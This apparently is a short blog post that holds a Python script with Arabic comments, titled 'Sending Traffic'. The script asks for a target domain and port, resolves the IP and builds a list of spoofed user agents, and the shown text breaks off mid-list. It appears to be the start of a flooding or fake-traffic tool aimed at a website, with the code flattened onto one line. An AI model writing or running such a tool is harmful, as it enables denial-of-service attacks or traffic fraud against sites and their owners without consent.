Articles

Affichage des articles du janvier, 2025

Hedi

import requests import random import time import socket import os from datetime import datetime import concurrent.futures # الحصول على التاريخ والوقت الحالي now = datetime.now() hour = now.hour minute = now.minute day = now.day month = now.month year = now.year # مسح الشاشة os.system("clear") os.system("figlet Sending Traffic") print("Author : YourName") print("github : https://github.com/YourGithub") print() # طلب اسم النطاق أو الـ IP domain = input("Target Domain (e.g., example.blogspot.com): ") port = int(input("Port : ")) # تأكد من أن القيمة المدخلة هي عدد صحيح # تحويل اسم النطاق إلى عنوان IP try: ip = socket.gethostbyname(domain) print(f"Resolved IP: {ip}") except socket.gaierror: print("Error: Unable to resolve the domain to IP.") exit() # قائمة وكيل المستخدم (User Agents) user_agents = [ 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) Appl...